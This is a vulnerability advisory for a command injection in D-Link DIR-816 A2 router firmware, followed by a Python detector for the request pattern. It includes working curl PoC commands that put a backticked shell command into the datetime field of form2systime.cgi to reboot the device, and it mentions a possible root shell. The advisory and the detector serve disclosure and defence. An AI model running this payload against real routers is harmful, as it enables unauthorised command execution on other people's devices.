D-Link DIR-816 A2_v1.10CNB04.img command injection vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

In /goform/form2systime.cgi, the only condition for triggering the command injection is that the datetime parameter contains -:

Poc

First you need to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Next, run the following PoC; you can see that the router restarts

curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=xxxxx -d 'datetime=`reboot`-:'

Finally, an exploit can be written to obtain a root shell
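
For detection, the request shape used in the PoC can be matched in proxy or IDS logs. The following is an added example, not part of the original write-up or of D-Link's code: it flags POSTs to /goform/form2systime.cgi whose decoded datetime value contains shell metacharacters. The function name, the metacharacter list and the benign sample value `2020-01-01 12:00:00` are assumptions; the sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

TARGET_PATH = "/goform/form2systime.cgi"
# Characters a shell treats as command substitution, chaining or redirection
# (assumed list; extend it to match the shell on the device).
SHELL_META = re.compile(r"[`$;|&<>(){}\\\n\r]")


def suspicious_datetime(method, url, body):
    """Return the decoded datetime values that carry shell metacharacters."""
    if method.upper() != "POST" or urlsplit(url).path != TARGET_PATH:
        return []
    # parse_qsl percent-decodes and turns '+' into a space, so encoded
    # payloads (%60 for a backtick) are matched on their decoded form.
    fields = parse_qsl(body, keep_blank_values=True)
    return [v for k, v in fields if k == "datetime" and SHELL_META.search(v)]


# Constructed sample requests (method, URL, form body); not captured traffic.
SAMPLES = [
    # Assumed benign value: a plain date and time.
    ("POST", "http://192.168.0.1/goform/form2systime.cgi",
     "tokenid=xxxxx&datetime=2020-01-01 12:00:00"),
    # The PoC body from this page.
    ("POST", "http://192.168.0.1/goform/form2systime.cgi",
     "tokenid=xxxxx&datetime=`reboot`-:"),
    # The same body percent-encoded, as a client library would send it.
    ("POST", "http://192.168.0.1/goform/form2systime.cgi",
     "tokenid=xxxxx&datetime=%60reboot%60-%3A"),
    # Unrelated request to the login page.
    ("GET", "http://192.168.0.1/dir_login.asp", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        hits = suspicious_datetime(method, url, body)
        print("ALERT" if hits else "ok", method, url, hits)
```

Matching on the decoded value is the important part: a signature written against the raw body would miss the percent-encoded request.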